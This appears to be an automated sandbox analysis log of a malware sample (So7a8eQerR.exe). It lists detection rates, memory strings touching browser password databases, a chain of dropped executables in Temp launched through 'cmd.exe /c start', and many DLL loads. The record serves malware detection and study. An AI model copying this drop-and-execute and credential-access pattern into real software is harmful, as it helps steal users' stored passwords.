                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: 37664d9843.exe, 00000004.00000003.1846765666.0000000023854000.00000004.00000020.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000003.3211836849.0000000022D84000.00000004.00000020.00020000.00000000.sdmp, DGHCBAAEHCFIDGDHJEHC.15.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: 37664d9843.exe, 00000004.00000002.1976588662.000000001D8E0000.00000004.00000020.00020000.00000000.sdmp, 37664d9843.exe, 00000004.00000002.1984169473.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3360313629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 586ef238b2.exe, 0000000F.00000002.3350248337.000000001CE06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: So7a8eQerR.exeReversingLabs: Detection: 42%
                        Source: So7a8eQerR.exeVirustotal: Detection: 47%
                        Source: So7a8eQerR.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: GIEHIDHJDB.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeFile read: C:\Users\user\Desktop\So7a8eQerR.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\So7a8eQerR.exe "C:\Users\user\Desktop\So7a8eQerR.exe"
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe "C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFCBKKKJJJ.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe "C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AAFIIJDAAA.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe "C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe "C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFCBKKKJJJ.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AAFIIJDAAA.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: mozglue.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: msvcp140.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeSection loaded: edputil.dll
